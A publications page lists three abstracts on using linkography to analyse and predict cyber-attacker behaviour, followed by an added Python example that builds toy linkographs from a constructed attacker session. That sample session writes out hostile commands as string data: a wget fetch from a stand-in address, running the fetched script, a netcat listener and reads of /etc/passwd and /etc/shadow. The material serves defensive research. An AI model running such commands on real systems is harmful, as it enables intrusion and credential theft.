Publications

7 Results

Linkography abstraction refinement and cyber security

2017 IEEE Conference on Communications and Network Security, CNS 2017

Foulk, James W.; Mcbride, Marci; Jarocki, John

Attacks authored by state-sponsored actors, criminal outfits, ideological enclaves and recreational hackers continue to trouble public and private cyber systems. In order to create and/or maintain an advantage over their adversaries, cyber defenders must pursue novel ways to detect, attribute and respond to offensive operations. Linkography is a topic that has been explored for decades and has found recent application to cyber security. Given the huge amounts of data available for cyber security applications of linkography, we favor semi-automated techniques to exploit this concept. In this paper, we propose a human-supervised algorithm that refines the abstractions used for this bulk approach to linkography. We found that this algorithm resulted in automatically generated linkographs with higher accuracies than those derived from static abstractions. These findings suggest that linkography in general and abstraction refinement in particular are viable tools for cyber security practitioners.

Final LDRD Report: Using Linkography of Cyber Attack Patterns to Inform Honeytoken Placement

Foulk, James W.; Jarocki, John; Fisher, Anna L.

The war to establish cyber supremacy continues, and the literature is crowded with strictly technical cyber security measures. We present the results of a three-year LDRD project that uses linkography, a methodology new to the field of cyber security, to establish the foundation necessary to track and profile the microbehavior of humans attacking cyber systems. We also propose ways to leverage this understanding to influence and deceive these attackers. We studied the science of linkography, applied it to the cyber security domain, implemented a software package to manage linkographs, generated the preprocessing blocks necessary to ingest raw data, produced machine learning models, created ontology refinement algorithms and prototyped a web application for researchers and practitioners to apply linkography. Machine learning produced some of our key results: we trained and validated multinomial classifiers with a real-world data set and predicted the attacker's next category of action with 86 to 98% accuracy; dimension reduction techniques indicated that the linkography-based features were among the most powerful. We also discovered ontology refinement algorithms that advanced the state of the art in linkography in general and cyber security in particular. We conclude that linkography is a viable tool for cyber security; we look forward to expanding our work to other data sources and using our prediction results to enable adversary deception techniques.

Using linkography to understand cyberattacks

2015 IEEE Conference on Communications and Network Security, CNS 2015

Fisher, Anna L.; Kent, Carson; Zage, David J.; Jarocki, John

In the realm of cyber security, recent events have demonstrated the need for a significant change in the philosophies guiding the identification and mitigation of attacks. The unprecedented increase in the quantity and sophistication of cyber attacks in the past year alone has proven the inadequacy of current defensive philosophies that do not assume continuous compromise. This has given rise to new perspectives on cyber defense where, instead of total prevention, threat intelligence is the crucial tool allowing the mitigation of cyber threats. This paper formalizes a new framework for obtaining threat intelligence from an active cyber attack and demonstrates the realization of this framework in the software tool, LinkShop. Specifically, using the behavioral analysis technique known as linkography, our framework allows cyber defenders to, in an automated fashion, quantitatively capture both general and nuanced patterns in attackers' behavior - pushing capabilities for generating threat intelligence far beyond what is currently possible with rudimentary indicators of compromise and into the realm of capability needed to combat future cyber attackers. Furthermore, this paper shows in detail how such knowledge can be achieved by using LinkShop on actual cyber event data and lays a foundation for further scientific investigation into cyber attacker behavior.
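The three abstracts above describe linkography applied to attacker sessions and the effect of refining the abstraction that maps raw events to categories. The following is an added illustration, not LinkShop or the authors' code, of the basic mechanics: a constructed shell session stands in for event data, two abstractions (a coarse one keyed on the command name and a refined one a human supervisor might add) map each move to a category, and an assumed linking rule (equal categories or an ordered pair in a RELATED set) produces the linkograph. Link index and critical moves follow the standard linkography definitions; the Jaccard agreement between two link sets is one way to score an abstraction against a reference linkograph, which the papers obtain from human analysis and this example does not have. All commands, categories and the RELATED set are constructed for the example.

```python
"""Toy linkograph of a constructed attacker session (added example, not
LinkShop or the authors' code).

A session is a sequence of "moves"; two moves are linked when they are
judged related.  Here a move is one shell command, an abstraction maps
each command to a category, and an ASSUMED linking rule links two moves
when their categories are equal or form an ordered pair in RELATED.
"""
from collections import Counter
from typing import Callable, Dict, Iterable, List, Set, Tuple

# Constructed sample session; not real attacker data.
SESSION: List[str] = [
    "whoami",
    "uname -a",
    "cat /etc/passwd",
    "wget http://198.51.100.7/x.sh",   # TEST-NET address, constructed
    "chmod +x x.sh",
    "./x.sh",
    "nc -l -p 4444",
    "cat /etc/shadow",
]

# Assumed linking rule: earlier category -> later category pairs that count
# as related, in addition to equal categories.
RELATED: Set[Tuple[str, str]] = {
    ("recon", "tooling"),
    ("tooling", "execute"),
    ("execute", "c2"),
    ("c2", "credential_access"),
}

# Coarse abstraction: category chosen from the first token only (assumed).
COARSE_CATEGORIES: Dict[str, str] = {
    "whoami": "recon", "uname": "recon", "cat": "recon",
    "wget": "tooling", "chmod": "tooling",
    "./x.sh": "execute", "nc": "c2",
}


def coarse_abstraction(command: str) -> str:
    """Map a command to a category by its first token."""
    return COARSE_CATEGORIES.get(command.split()[0], "other")


def refined_abstraction(command: str) -> str:
    """A refinement a human supervisor might add: reading a credential
    store is not plain reconnaissance."""
    if command.startswith("cat ") and "/etc/shadow" in command:
        return "credential_access"
    return coarse_abstraction(command)


def build_linkograph(session: Iterable[str],
                     abstraction: Callable[[str], str]
                     ) -> Tuple[List[str], List[Tuple[int, int]]]:
    """Return (categories, links); each link is an (i, j) pair with i < j."""
    cats = [abstraction(cmd) for cmd in session]
    links = [
        (i, j)
        for i in range(len(cats))
        for j in range(i + 1, len(cats))
        if cats[i] == cats[j] or (cats[i], cats[j]) in RELATED
    ]
    return cats, links


def link_index(session: List[str], links: List[Tuple[int, int]]) -> float:
    """Links per move: how interconnected the session is overall."""
    return len(links) / len(session)


def critical_moves(links: List[Tuple[int, int]], threshold: int) -> List[int]:
    """Moves with at least `threshold` links (back-links plus fore-links)."""
    degree: Counter = Counter()
    for i, j in links:
        degree[i] += 1
        degree[j] += 1
    return sorted(m for m, d in degree.items() if d >= threshold)


def link_agreement(links_a: List[Tuple[int, int]],
                   links_b: List[Tuple[int, int]]) -> float:
    """Jaccard overlap of two link sets (1.0 = identical linkographs)."""
    a, b = set(links_a), set(links_b)
    return len(a & b) / len(a | b) if a | b else 1.0


if __name__ == "__main__":
    results = {}
    for name, abstraction in (("coarse", coarse_abstraction),
                              ("refined", refined_abstraction)):
        cats, links = build_linkograph(SESSION, abstraction)
        results[name] = links
        print(name, cats)
        print("  links:", len(links), " link index:", link_index(SESSION, links))
        print("  critical moves (>=5 links):", critical_moves(links, 5))
    print("agreement coarse vs refined:",
          round(link_agreement(results["coarse"], results["refined"]), 3))
```

Under the coarse abstraction the final `cat /etc/shadow` links back to every early reconnaissance move, so the linkograph says the session ends where it began; under the refined abstraction that move instead links forward from the `nc` listener, which matches the session's actual progression. That is the kind of structural change an abstraction refinement produces, and scoring it requires a reference linkograph, which in the papers comes from human analysis.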
